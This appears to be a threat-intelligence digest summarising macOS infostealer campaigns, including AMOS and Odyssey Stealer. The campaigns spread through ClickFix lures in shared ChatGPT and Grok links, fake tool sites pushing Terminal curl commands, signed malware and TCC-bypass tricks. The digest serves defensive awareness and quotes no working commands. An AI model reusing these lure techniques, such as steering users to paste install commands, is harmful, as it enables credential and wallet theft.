macOS Infostealer Campaigns Using Social Engineering and Evasion Tactics
Threat actors are escalating macOS infostealer activity through multiple distribution and evasion techniques aimed at harvesting sensitive user data. One campaign abuses trust in legitimate AI platforms by promoting shareable ChatGPT and Grok conversation links via Google Ads, luring users searching for common macOS troubleshooting help into running malicious Terminal commands using the “ClickFix” social-engineering pattern. Executing the provided shell commands results in installation of Atomic macOS Stealer (AMOS), which steals browser credentials, crypto wallet seed phrases, Keychain data, and personal files before exfiltrating them to attacker-controlled infrastructure.
Separately, Odyssey Stealer intrusions against macOS have surged globally, with notable targeting reported in the U.S., France, and Spain and additional impact across Europe, the Americas, and parts of Asia and Africa. Moonlock Lab reporting indicates Odyssey is delivered through fake software updates, cracked tools, and fraudulent apps, and is designed to evade detection by generating a unique fingerprint per infection, frequently changing code structure, and using many distinct SHA-256 variants—suggesting automated builders are being used to produce large numbers of hard-to-block samples. Collectively, the reporting highlights sustained pressure on macOS users from credential-stealing malware that blends high-trust lures with rapid variant generation to hinder traditional defenses.
Sources
Related Stories
Microsoft Warns macOS Infostealer Campaigns Using ClickFix Lures, Malicious DMGs, and Python Stealers
Microsoft reported that **information-stealing malware activity is expanding from Windows to macOS**, driven by campaigns observed since late 2025 that rely on social engineering and cross-platform tooling. The activity includes **ClickFix-style prompts** and **malicious DMG installers** that deliver macOS-focused infostealer families such as **Atomic macOS Stealer (AMOS)**, **MacSync**, and **DigitStealer**, with operators leveraging **fileless execution**, **native macOS utilities**, and **AppleScript automation** to evade defenses and automate collection. Initial access commonly starts with **malicious search ads (e.g., Google Ads)** that redirect users to fake sites impersonating legitimate tools and then trick victims into running “fix” steps or installing trojanized software. The malware is assessed to target high-value data including browser credentials and session cookies, **iCloud Keychain** contents, crypto wallet data, and **developer secrets**; Microsoft also highlighted growing use of **Python-based stealers** distributed via phishing for rapid adaptation across heterogeneous environments, citing **PXA Stealer** (linked to Vietnamese-speaking actors) as an example used in late-2025 campaigns with persistence mechanisms such as registry `Run` keys or scheduled tasks and **Telegram** used for command-and-control.
1 months ago
macOS Malware Campaigns Shift Toward Infostealers and Social Engineering to Bypass Apple Protections
Threat actors are increasingly targeting macOS users with **infostealers** and distribution-as-a-service models, reflecting a broader “gold rush” in Apple-focused malware development. Reporting highlights macOS stealers targeting browser credentials and cryptocurrency assets (including seed phrases) and notes tactics to evade Apple controls such as obtaining valid Apple developer signatures to bypass *Gatekeeper*; one cited example is *MacSync* being notarized and signed under Team ID `GNJLS3UYZ4`. The same reporting describes ecosystem-scale enablement, including large-scale compromise of WordPress sites for distribution and novel command-and-control approaches such as using blockchain smart contracts (e.g., on **BNB Smart Chain**), alongside paid-traffic abuse (e.g., promoting malicious AI chat content via ads) to push stealer payloads. Separately, a Darktrace-described investigation details a **multi-stage macOS malware** campaign that prioritizes *social engineering* over exploitation to defeat Apple’s **Transparency, Consent, and Control (TCC)** privacy framework. Victims are lured via phishing to open an AppleScript masquerading as a document (`Confirmation_Token_Vesting.docx.scpt`), which displays a fake “Compatibility” error and instructs the user to launch a “Compatibility Wizard” (e.g., using a keyboard shortcut) that effectively tricks them into authorizing execution and granting access. Together, the reporting indicates macOS threats are increasingly succeeding by combining credential/crypto theft objectives with user-prompt manipulation and trust-abuse techniques rather than relying on kernel or sandbox escapes.
1 months agoMalvertising Campaign Delivers AMOS and Odyssey Stealer via Fake macOS Tool Sites
A sophisticated cybercriminal campaign has been identified targeting macOS users, particularly developers, by leveraging fake download portals that impersonate trusted platforms such as Homebrew, LogMeIn, and TradingView. The attackers have registered over 85 domains that closely mimic the legitimate sites of these popular tools, using convincing branding and user interfaces to deceive visitors. These malicious domains are promoted through Google Ads, ensuring that they appear prominently in search results and increasing the likelihood that unsuspecting users will visit them. Once on the fake sites, users are instructed to copy and execute a curl command in their Terminal, which initiates the download and installation of infostealing malware. The primary payloads delivered in this campaign are AMOS (Atomic macOS Stealer) and Odyssey Stealer, both of which are capable of harvesting sensitive information such as system details, browser data, and cryptocurrency credentials from infected machines. The campaign employs advanced social engineering tactics, including clipboard manipulation and command obfuscation, to increase the success rate of infections. Researchers from Hunt.io have mapped the infrastructure supporting this operation, noting that the attackers reuse IP addresses and SSL certificates across multiple domains, indicating a persistent and well-organized effort. The infrastructure has been active for several years, with some IP addresses registered under personal names, suggesting a degree of operational continuity and experience. The campaign does not rely on exploiting software vulnerabilities but instead exploits user trust in widely used open-source and financial tools. The use of Google Ads as a distribution vector highlights the attackers' willingness to invest in paid advertising to reach their targets. The campaign's focus on the developer community is particularly concerning, as compromised developer systems could lead to broader supply chain risks. Security researchers have emphasized the importance of verifying download sources and being wary of unsolicited installation instructions, especially those involving Terminal commands. The ongoing nature of the campaign, with continuous adaptation of infrastructure and tactics, underscores the need for vigilance among macOS users. The discovery of this campaign began with public reports from independent researchers, which were then corroborated and expanded upon by threat intelligence teams. The scale and persistence of the operation suggest that it is likely to continue evolving, posing a significant threat to the macOS ecosystem. Organizations are advised to educate users about the risks of malvertising and to implement technical controls to block access to known malicious domains. The campaign demonstrates the increasing sophistication of social engineering attacks targeting macOS, a platform often perceived as less vulnerable than Windows.
4 months ago